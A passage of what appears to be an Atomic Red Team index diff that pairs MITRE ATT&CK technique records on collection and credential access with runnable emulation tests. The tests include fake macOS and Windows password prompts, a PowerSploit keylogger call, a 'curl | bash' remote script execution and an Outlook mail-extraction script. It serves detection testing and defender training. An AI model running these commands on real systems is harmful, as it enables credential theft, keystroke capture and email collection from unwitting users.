https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/ + description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. + Retrieved October 8, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Email Forwarding Rule + description: "Adversaries may setup email forwarding rules to collect sensitive + information. Adversaries may abuse email-forwarding rules to monitor the activities + of a victim, steal information, and further gain intelligence on the victim + or the victim’s organization to use as part of further exploits or operations.(Citation: + US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create + inbox rules for various email functions, including forwarding to a different + recipient. Messages can be forwarded to internal or external recipients, and + there are no restrictions limiting the extent of this rule. Administrators + may also create forwarding rules for user accounts with the same considerations + and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) + \n\nAny user or administrator within the organization (or adversary with valid + credentials) can create rules to automatically forward all received messages + to another recipient, forward emails to different locations based on the sender, + and more." + id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-19T22:43:45.509Z' + created: '2020-02-19T18:54:47.103Z' + x_mitre_contributors: + - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. + + Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. + x_mitre_data_sources: + - Process use of network + - Process monitoring + - Email gateway + - Mail server + - Office 365 trace logs + x_mitre_platforms: + - Office 365 + - Windows + atomic_tests: [] + T1056.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1056.002 + url: https://attack.mitre.org/techniques/T1056/002 + - external_id: CAPEC-659 + source_name: capec + url: https://capec.mitre.org/data/definitions/659.html + - url: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html + description: Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits + Mackeeper. Retrieved July 3, 2017. + source_name: OSX Malware Exploits MacKeeper + - source_name: LogRhythm Do You Trust Oct 2014 + url: https://logrhythm.com/blog/do-you-trust-your-computer/ + description: Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved + December 17, 2018. + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + - source_name: Enigma Phishing for Credentials Jan 2015 + url: https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ + description: 'Nelson, M. (2015, January 21). Phishing for Credentials: If + you want it, just ask!. Retrieved December 17, 2018.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: GUI Input Capture + description: "Adversaries may mimic common operating system GUI components to + prompt users for credentials with a seemingly legitimate prompt. When programs + are executed that need additional privileges than are present in the current + user context, it is common for the operating system to prompt the user for + proper credentials to authorize the elevated privileges for the task (ex: + [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries + may mimic this functionality to prompt users for credentials with a seemingly + legitimate prompt for a number of reasons that mimic normal usage, such as + a fake installer requiring additional access or a fake malware removal suite.(Citation: + OSX Malware Exploits MacKeeper) This type of prompt can be used to collect + credentials via various languages such as AppleScript(Citation: LogRhythm + Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: + LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials + Jan 2015). " + id: attack-pattern--a2029942-0a85-4947-b23c-ca434698171d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-03-24T20:56:14.853Z' + created: '2020-02-11T18:58:45.908Z' + x_mitre_contributors: + - Matthew Molyett, @s1air, Cisco Talos + x_mitre_data_sources: + - PowerShell logs + - User interface + - Process command-line parameters + - Process monitoring + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. + + Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - macOS + - Windows + identifier: T1056.002 + atomic_tests: + - name: AppleScript - Prompt User for Password + auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 + description: | + Prompt User for Password (Local Phishing) + Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + supported_platforms: + - macos + executor: + command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell + app "System Preferences" to activate'' -e ''tell app "System Preferences" + to display dialog "Software Update requires that you type your password + to apply changes." & return & return default answer "" with icon 1 with + hidden answer with title "Software Update"'' + +' + name: bash + - name: PowerShell - Prompt User for Password + auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + description: | + Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. + + Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py + supported_platforms: + - windows + executor: + command: "# Creates GUI to prompt for password. Expect long pause before prompt + is available. \n$cred = $host.UI.PromptForCredential('Windows Security + Update', '',[Environment]::UserName, [Environment]::UserDomainName)\n# Using + write-warning to allow message to show on console as echo and other similar + commands are not visable from the Invoke-AtomicTest framework.\nwrite-warning + $cred.GetNetworkCredential().Password\n" + name: powershell + T1056: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1056 + url: https://attack.mitre.org/techniques/T1056 + - external_id: CAPEC-569 + source_name: capec + url: https://capec.mitre.org/data/definitions/569.html + - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf + description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth + look into keyloggers on Windows. Retrieved April 27, 2016.' + source_name: Adventures of a Keystroke + description: Adversaries may use methods of capturing user input to obtain credentials + or collect information. During normal system usage, users often provide credentials + to various different locations, such as login pages/portals or system dialog + boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential + API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving + the user into providing input into what they believe to be a genuine service + (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)). + name: Input Capture + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-10-21T01:31:35.760Z' + created: '2017-05-31T21:30:48.323Z' + x_mitre_version: '1.2' + x_mitre_contributors: + - John Lambert, Microsoft Threat Intelligence Center + x_mitre_data_sources: + - Windows Registry + - Windows event logs + - User interface + - Process command-line parameters + - Process monitoring + - PowerShell logs + - Loaded DLLs + - Kernel drivers + - DLL monitoring + - Binary file metadata + - API monitoring + x_mitre_detection: 'Detection may vary depending on how input is captured but + may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, + `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), + monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), + and ensuring no unauthorized drivers or kernel modules that could indicate + keylogging or API hooking are present.' + x_mitre_permissions_required: + - Administrator + - SYSTEM + - root + - User + x_mitre_platforms: + - Linux + - macOS + - Windows + - Network + x_mitre_is_subtechnique: false + atomic_tests: [] + T1056.001: + technique: + id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " + name: Keylogging + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1056.001 + url: https://attack.mitre.org/techniques/T1056/001 + - external_id: CAPEC-568 + source_name: capec + url: https://capec.mitre.org/data/definitions/568.html + - url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf + description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth + look into keyloggers on Windows. Retrieved April 27, 2016.' + source_name: Adventures of a Keystroke + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-10-21T01:30:56.227Z' + created: '2020-02-11T18:58:11.791Z' + x_mitre_platforms: + - Windows + - macOS + - Linux + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification + to the Registry and installation of a driver, setting a hook, or polling to + intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, + and `GetAsyncKeyState`.(Citation: Adventures of a Keystroke) Monitor the Registry + and file system for such changes, monitor driver installs, and look for common + keylogging API calls. API calls alone are not an indicator of keylogging, + but may provide behavioral data that is useful when combined with other information + such as new files written to disk and unusual processes.' + x_mitre_permissions_required: + - Administrator + - root + - SYSTEM + - User + x_mitre_data_sources: + - Windows Registry + - Process monitoring + - API monitoring + identifier: T1056.001 + atomic_tests: + - name: Input Capture + auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 + description: | + Utilize PowerShell and external resource to capture keystrokes + [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) + Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) + + Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. + supported_platforms: + - windows + input_arguments: + filepath: + description: Name of the local file, include path. + type: Path + default: "$env:TEMP\\key.log" + executor: + command: | + Set-Location $PathToAtomicsFolder + .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} + cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore + +' + name: powershell + elevation_required: true + T1557.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1557.001 + url: https://attack.mitre.org/techniques/T1557/001 + - url: https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution + description: Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. + Retrieved November 17, 2017. + source_name: Wikipedia LLMNR + - url: https://technet.microsoft.com/library/cc958811.aspx + description: Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November + 17, 2017. + source_name: TechNet NetBIOS + - source_name: byt3bl33d3r NTLM Relaying + url: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html + description: Salvati, M. (2017, June 2). Practical guide to NTLM Relaying + in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February + 7, 2019. + - source_name: Secure Ideas SMB Relay + url: https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html + description: Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays + Should Be On Your Mind. Retrieved February 7, 2019. + - url: https://github.com/nomex/nbnspoof + description: Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017. + source_name: GitHub NBNSpoof + - url: https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response + description: Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. + source_name: Rapid7 LLMNR Spoofer + - url: https://github.com/SpiderLabs/Responder + description: Gaffie, L. (2016, August 25). Responder. Retrieved November 17, + 2017. + source_name: GitHub Responder + - url: https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning + description: 'Sternstein, J. (2013, November). Local Network Attacks: LLMNR + and NBT-NS Poisoning. Retrieved November 17, 2017.' + source_name: Sternsecurity LLMNR-NBTNS + - url: https://github.com/Kevin-Robertson/Conveigh + description: Robertson, K. (2016, August 28). Conveigh. Retrieved November + 17, 2017. + source_name: GitHub Conveigh + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: LLMNR/NBT-NS Poisoning and SMB Relay + description: "By responding to LLMNR/NBT-NS network traffic, adversaries may + spoof an authoritative source for name resolution to force communication with + an adversary controlled system. This activity may be used to collect or relay + authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) + and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve + as alternate methods of host identification. LLMNR is based upon the Domain + Name System (DNS) format and allows hosts on the same local link to perform + name resolution for other hosts. NBT-NS identifies systems on a local network + by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries + can spoof an authoritative source for name resolution on a victim network + by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know + the identity of the requested host, effectively poisoning the service so that + the victims will communicate with the adversary controlled system. If the + requested host belongs to a resource that requires identification/authentication, + the username and NTLMv2 hash will then be sent to the adversary controlled + system. The adversary can then collect the hash information sent over the + wire through tools that monitor the ports for traffic or through [Network + Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes + offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to + obtain the plaintext passwords. In some cases where an adversary has access + to a system that is in the authentication path between systems or when automated + scans that use credentials attempt to authenticate to an adversary controlled + system, the NTLMv2 hashes can be intercepted and relayed to access and execute + code against a target system. The relay step can happen in conjunction with + poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: + Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison + name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). + (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub + Responder)" + id: attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-31T13:54:08.239Z' + created: '2020-02-11T19:08:51.677Z' + x_mitre_contributors: + - Eric Kuehn, Secure Ideas + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - Windows event logs + - Windows Registry + - Packet capture + - Netflow/Enclave netflow + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS) + + Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy. + + Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay) + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1074.001: + technique: + created: '2020-03-13T21:13:10.467Z' + modified: '2020-05-26T19:23:54.854Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c + description: Adversaries may stage collected data in a central location or directory + on the local system prior to Exfiltration. Data may be kept in separate files + or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). + Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) + and bash may be used to copy data into a staging location. + name: Local Data Staging + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1074.001 + url: https://attack.mitre.org/techniques/T1074/001 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - Process command-line parameters + - Process monitoring + - File monitoring + x_mitre_detection: |- + Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. + + Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1074.001 + atomic_tests: + - name: Stage data from Discovery.bat + auto_generated_guid: 107706a5-6f9f-451a-adae-bab8c667829f + description: | + Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, + verify that the file is saved in the temp directory. + supported_platforms: + - windows + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "$env:TEMP\\discovery.bat" + executor: + command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" + -OutFile #{output_file} + +' + cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore + +' + name: powershell + - name: Stage data from Discovery.sh + auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 + description: 'Utilize curl to download discovery.sh and execute a basic information + gathering shell script + +' + supported_platforms: + - linux + - macos + input_arguments: + output_file: + description: Location to save downloaded discovery.bat file + type: Path + default: "/tmp/T1074.001_discovery.log" + executor: + command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh + | bash -s > #{output_file} + +' + name: bash + - name: Zip a Folder with PowerShell for Staging in Temp + auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a + description: | + Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip + was placed in the temp directory. + supported_platforms: + - windows + input_arguments: + output_file: + description: Location to save zipped file or folder + type: Path + default: "$env:TEMP\\Folder_to_zip.zip" + input_file: + description: Location of file or folder to zip + type: Path + default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip + executor: + command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} + -Force + +' + cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore + +' + name: powershell + T1114.001: + technique: + created: '2020-02-19T18:46:06.098Z' + modified: '2020-03-24T17:59:20.983Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004 + description: |- + Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. + + Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files) + name: Local Email Collection + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1114.001 + url: https://attack.mitre.org/techniques/T1114/001 + - source_name: Outlook File Sizes + url: https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/ + description: N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and + OST File Sizes. Retrieved February 19, 2020. + - source_name: Microsoft Outlook Files + url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790 + description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and + .ost). Retrieved February 19, 2020. + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - Process monitoring + - File monitoring + - Authentication logs + - Mail server + x_mitre_detection: Monitor processes and command-line arguments for actions + that could be taken to gather local email files. Monitor for unusual processes + accessing local email files. Remote access tools with built-in features may + interact directly with the Windows API to gather information. Information + may also be acquired through Windows system management tools such as [Windows + Management Instrumentation](https://attack.mitre.org/techniques/T1047) and + [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1114.001 + atomic_tests: + - name: Email Collection with PowerShell Get-Inbox + auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb + description: | + Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. + Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. + + Note: Outlook is required, but no email account necessary to produce artifacts. + supported_platforms: + - windows + input_arguments: + output_file: + description: Output file path + type: String + default: "$env:TEMP\\mail.csv" + file_path: + description: File path for Get-Inbox.ps1 + type: String + default: PathToAtomicsFolder\T1114.001\src + dependency_executor_name: powershell + dependencies: + - description: 'Get-Inbox.ps1 must be located at #{file_path} + +' + prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit + 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" + -OutFile "#{file_path}\Get-Inbox.ps1" + +' + executor: + command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 + -file #{output_file} + +' + cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore + +' + name: powershell + T1185: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1185 + external_id: T1185 + - url: https://en.wikipedia.org/wiki/Man-in-the-browser + description: Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved + January 10, 2018. + source_name: Wikipedia Man in the Browser + - url: https://www.cobaltstrike.com/help-browser-pivoting + description: Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018. + source_name: Cobalt Strike Browser Pivot + - url: https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses + description: De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME + EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL + BUSINESSES. Retrieved January 17, 2018. + source_name: ICEBRG Chrome Extensions + - url: https://cobaltstrike.com/downloads/csmanual38.pdf + description: Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. + Retrieved May 24, 2017. + source_name: cobaltstrike manual + description: |- + Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser) + + A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions) + + Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual) + name: Man in the Browser + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-07-14T19:39:44.590Z' + created: '2018-01-16T16:13:52.465Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' + x_mitre_contributors: + - Justin Warner, ICEBRG + x_mitre_data_sources: + - Authentication logs + - Packet capture + - Process monitoring + - API monitoring + x_mitre_detection: This is a difficult technique to detect because adversary + traffic would be masked by normal user traffic. No new processes are created + and no additional software touches disk. Authentication logs can be used to + audit logins to specific web applications, but determining malicious logins + versus benign logins may be difficult if activity matches typical user behavior. + Monitor for process injection against browser applications + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_platforms: + - Windows + atomic_tests: [] + T1557: + technique: + external_references: + - source_name: mitre-attack + external_id: T1557 + url: https://attack.mitre.org/techniques/T1557 + - external_id: CAPEC-94 + source_name: capec + url: https://capec.mitre.org/data/definitions/94.html + - source_name: Rapid7 MiTM Basics + url: https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/ + description: Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March + 2, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Man-in-the-Middle + description: |- + Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) + + Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service. + id: attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-16T15:19:48.733Z' + created: '2020-02-11T19:07:12.114Z' + x_mitre_contributors: + - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project + x_mitre_detection: Monitor network traffic for anomalies associated with known + MiTM behavior. Consider monitoring for modifications to system configuration + files involved in shaping network traffic flow. + x_mitre_data_sources: + - File monitoring + - Netflow/Enclave netflow + - Packet capture + x_mitre_permissions_required: + - User + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - macOS + - Linux + atomic_tests: [] + T1602.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1602.002 + url: https://attack.mitre.org/techniques/T1602/002 + - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018 + url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A + description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors + Targeting Network Infrastructure Devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue 